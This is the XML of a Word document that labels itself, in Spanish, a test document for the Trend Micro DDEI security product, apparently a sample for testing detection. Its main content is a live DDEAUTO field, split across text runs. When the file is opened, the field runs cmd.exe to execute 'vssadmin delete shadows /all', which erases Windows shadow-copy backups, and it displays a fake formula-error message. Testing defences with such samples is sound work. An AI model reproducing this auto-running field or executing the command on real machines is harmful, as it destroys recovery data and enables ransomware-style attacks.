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C27" w:rsidRDefault="00D0031A">
      <w:r>
        <w:t>Documento de prueba para Trend Micro DDEI</w:t>
      </w:r>
      <w:r w:rsidR="00173819">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173819" w:rsidRPr="00B53F4C" w:rsidRDefault="00B53F4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B53F4C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Borrar shadow copies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0031A" w:rsidRDefault="00D0031A">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO C:\\Windows</w:instrText>
      </w:r>
      <w:r w:rsidR="00D00488">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>\System32\\cmd.exe</w:instrText>
      </w:r>
      <w:r w:rsidR="008C3C88">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="008E7E1B">
        <w:instrText xml:space="preserve">/k </w:instrText>
      </w:r>
      <w:r w:rsidR="003D2C8F">
        <w:instrText>vssadmin</w:instrText>
      </w:r>
      <w:r w:rsidR="006B45C2">
        <w:instrText xml:space="preserve"> delete  shadows /all</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> " </w:instrText>
      </w:r>
      <w:r w:rsidR="008C3C88">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Final de fórmula inesperado</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00D00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31A"/>
    <w:rsid w:val="00165E85"/>
    <w:rsid w:val="00173819"/>
    <w:rsid w:val="001C360C"/>
    <w:rsid w:val="003A7CCC"/>
    <w:rsid w:val="003D2C8F"/>
    <w:rsid w:val="00404A57"/>
    <w:rsid w:val="004C7C62"/>
    <w:rsid w:val="006B45C2"/>
    <w:rsid w:val="006C69DA"/>
    <w:rsid w:val="007005DF"/>
    <w:rsid w:val="0073478B"/>
    <w:rsid w:val="007A751A"/>
    <w:rsid w:val="008C3C88"/>
    <w:rsid w:val="008E7E1B"/>
    <w:rsid w:val="00B330BD"/>
    <w:rsid w:val="00B50F4C"/>
    <w:rsid w:val="00B53F4C"/>
    <w:rsid w:val="00D0031A"/>
    <w:rsid w:val="00D0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104DA-BBB6-463F-A6FB-9AF8287B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2017-11-09T15:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-10T21:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>